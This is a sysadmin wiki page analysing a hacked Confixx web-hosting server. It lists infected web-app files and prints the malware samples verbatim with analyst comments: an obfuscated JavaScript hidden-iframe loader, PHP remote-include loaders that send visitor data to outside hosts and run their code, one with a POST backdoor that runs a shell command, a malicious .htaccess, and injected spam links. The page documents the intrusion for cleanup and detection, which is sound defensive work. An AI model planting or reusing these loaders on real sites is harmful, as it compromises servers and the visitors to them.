Hacked Confixx – HS Syswiki

Hacked Confixx

(Unterschied zwischen Versionen)
Zeile 3: Zeile 3:
 
grep for new files:
 
grep for new files:
  
cat new_files.log | grep -v 'png$' | grep -v 'gif$' | grep -v 'jpg$' | grep -v 'bmp$' | grep -v '^webapps' | grep -v '^languages' | sed ':a;N;$!ba;s/\n/ /g'
+
cat new_files.log | grep -v 'png$' | grep -v 'gif$' | grep -v 'jpg$' | grep -v 'bmp$' | sed ':a;N;$!ba;s/\n/ /g'
  
 
----
 
----

Version vom 10. September 2015, 14:17 Uhr

Hacked Confixx

grep for new files:

# Print the entries of new_files.log on a single space-separated line, leaving
# out every entry whose name ends in png, gif, jpg or bmp.
# Caveat: the filter looks at the name only, so a script or other payload stored
# under an image-style name is dropped from this list as well; check those
# entries separately (for example by their real content type).
grep -v -e 'png$' -e 'gif$' -e 'jpg$' -e 'bmp$' new_files.log | sed ':a;N;$!ba;s/\n/ /g'



login-6.hoststar.ch:

Some background information: http://lukewelling.com/category/spyware/


/home/www/confixx/html/webapps/zencart/index.de.html:

/home/www/confixx/html/webapps/xrms/index.de.html:

/home/www/confixx/html/webapps/xoops/index.de.html:

/home/www/confixx/html/webapps/xaraya/index.de.html:

/home/www/confixx/html/webapps/weberp/index.de.html:

/home/www/confixx/html/webapps/wbbook/index.de.html:

/home/www/confixx/html/webapps/vstat/index.de.html:

... haben aber anderen code vorhanden ...

<script language="javascript" type="text/javascript">/* Analyst note (sample kept verbatim): obfuscated loader injected into the page.
   Every character of k is shifted down by 3 (charCodeAt(t) - 3), the result is
   collected in h and written into the document with document.write(h).
   Decoded, h is a div styled "visibility: hidden; position: absolute" that wraps
   a 1x1 iframe whose src is http://user19.iframe.ru/?s=1, so visitors load the
   remote page without seeing it.
   Detection hints: a String.fromCharCode(... - 3) loop feeding document.write,
   or the shifted marker '?liudph' (which decodes to the iframe opening tag). */var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script>
<div style="visibility: hidden; position: absolute; left: 1; top: 1">iframe src="http://user19.iframe.ru/?s=1" fraborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div>



Search for "</p><a href=.*</a>" or for class=giepoaytr to locate the injected links.

You can use the following lists to find some of them: http://www.maxispecialisten.se/punbb-1.2.7/sess31002/lk.txt http://www.afdex.com/common/board/data/Automatic_Multi_Stage_Cold_Forging/sess31002/lk.txt

/home/www/confixx/html/webapps/weberp/index.de.html:

<a href="http://gallery.ransomed.us/albums/album06/SMS-%2BSamsung%2BSGH-S500.shtml" class=giepoaytr title="SMS- Samsung SGH-S500" target=_blank>SMS- Samsung SGH-S500</a>

/home/www/confixx/html/webapps/wbbook/index.de.html:

<a href="http://www.woltlab.de/products/burning_book/demo/">http://www.woltlab.de/products/burning_book/demo/</a>
<a href="http://www.flyfic.renaissance-ghost.net/stories/graphospasm/images/no%2Bcd%2Bcrack%2Btonka.jsp" class=giepoaytr title="no cd crack tonka">no cd crack tonka</a>

/home/www/confixx/html/webapps/vstat/index.de.html:

<a href="http://www.geraldlee.net/nm/jak%2Bm%2Bmio%2Bpl.phtml" class=giepoaytr target=_blank>jak m mio pl</a>

/home/www/confixx/html/webapps/typo/index.de.html:

<a href="http://www.konline.org/alber/gallery/albums/album02/Underground2-Crack.jsp" class=giepoaytr>Underground2-Crack</a>


/home/www/confixx/html/webapps/tsep/index.de.html:

<a href="http://www.squarefc.com/gallery/content/Mascot/diablo%202%20downlaod.phtml" class=giepoaytr>diablo 2 downlaod</a>

/home/www/confixx/html/webapps/topdownloads/index.de.html:

<a href="http://www.artmotion.between-worlds.net/iB_html/non-cgi/Skin/SKIN-2/grifin-barbie.html" class=giepoaytr title="grifin barbie">grifin barbie</a>

/home/www/confixx/html/webapps/template/index.de.html:

<a href="http://www.rockpoppyprincess.pinkgraffiti.com/cart/images/couter.strike1.6.dowload.shtml" class=giepoaytr>couter strike1.6 dowload</a>


/home/www/confixx/html/webapps/squirrelmail/index.de.html:

<a href="http://mkweb.mattkennedy.us/modules/news/images/topics/Warcraft_MAPHACK_v_1.20.shtml" class=giepoaytr>Warcraft MAPHACK v 1.20</a>


/home/www/confixx/html/webapps/zencart/guest.php:

/home/www/confixx/html/webapps/xrms/configs.php:

/home/www/confixx/html/webapps/xoops/include.php:

/home/www/confixx/html/webapps/xaraya/date.php:

<? /* Analyst note (sample kept verbatim): remote-include loader.
   - error_reporting(0) silences every PHP error, so a failed include leaves no visible trace.
   - $a..$h pick up HTTP_HOST, SERVER_NAME, REQUEST_URI, PHP_SELF, QUERY_STRING,
     HTTP_REFERER, HTTP_USER_AGENT and REMOTE_ADDR from $_SERVER, falling back to
     bare globals of the same name (presumably for register_globals-era setups).
   - $str is the base64 of each of those values joined with "." plus the suffix ".e",
     i.e. the visitor's request details are sent to the remote host in the query string.
   - The base64 literals decode to "http://", "user9.mshtml.ru" and "user7.htmltags.ru".
     include() is tried against the first host; if it returns false the second is used.
     Whatever the remote server answers is pulled into this page by include().
   - Remote include() only works while PHP allows URL includes (allow_url_fopen, and
     allow_url_include where that directive exists); disabling them stops this loader.
   - Detection hints: include() combined with base64_decode("aHR0cDovLw=="), and a
     short open tag followed directly by error_reporting(0). */ error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

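Pulls in remote content with include(): the base64 strings decode to "user9.mshtml.ru" (tried first) and "user7.htmltags.ru" (fallback), and the visitor's request details are sent along base64-encoded in the query string.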



/home/www/confixx/html/webapps/zencart/create.php:

/home/www/confixx/html/webapps/xrms/messages.php:

/home/www/confixx/html/webapps/xoops/includes.php:

/home/www/confixx/html/webapps/xaraya/report.php:

<?php
// Analyst note (sample kept verbatim): remote-include loader with a small
// POST-driven control channel. Comments below describe only what the code shows.

// Hide all PHP errors so a failing include leaves nothing visible in the page.
error_reporting(0);
// Optional operator credentials: POST fields "l" and "p" are forwarded to the
// remote host. With POST "input" set they are sent as base64(l) and
// base64(md5(p)); otherwise both are forwarded exactly as received.
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
// "&log" is appended unless the request carries POST "log_flg"; in that case
// $log_flg is never assigned and contributes nothing to the URL.
if(!isset($_POST["log_flg"])){$log_flg="&log";}
// The base64 literal decodes to "http://bis.iframe.ru/master.php?r_addr=".
// The URL is completed with the client IP as an unsigned integer, "&url=" plus
// base64(SERVER_NAME . REQUEST_URI), and the two strings built above, then
// fetched with include_once; "@" suppresses the warning if the fetch fails.
// REMOTE_ADDR and REQUEST_URI are written as bare constants, which relies on
// legacy PHP treating an undefined constant as its own name.
// Remote includes need URL includes to be permitted (allow_url_fopen, and
// allow_url_include where that directive exists); disabling them blocks this.
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    // Fallback when the remote include fails: a request with POST l=special gets
    // the marker "sys_active" followed by the output of the shell command
    // `uname -a`, i.e. the file confirms it is present and discloses system details.
    // Detection hints: POST requests carrying l=special, responses containing
    // "sys_active", and the base64 literal above in any PHP file.
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

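Pulls in remote content with include_once() from "http://bis.iframe.ru/master.php?r_addr=" (the decoded base64 string), passing the client IP, the requested URL and any posted l/p values.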



/home/www/confixx/html/webapps/zencart/.htaccess:

/home/www/confixx/html/webapps/xrms/.htaccess:

/home/www/confixx/html/webapps/xoops/.htaccess:

/home/www/confixx/html/webapps/xaraya/.htaccess:

# Analyst note (sample kept verbatim): attacker-supplied .htaccess.
# Turns off MultiViews content negotiation for this directory.
Options -MultiViews
# Every request in this directory that ends in a 404 is answered by guest.php,
# one of the files listed on this page as containing the remote-include loader,
# so a request for any missing path runs that file. Only the zencart variant is
# shown here; the other listed .htaccess files presumably point at their own
# app's dropped file - verify on disk.
ErrorDocument 404 //webapps/zencart/guest.php

Always forces a 404 error and redirects to the malware file.

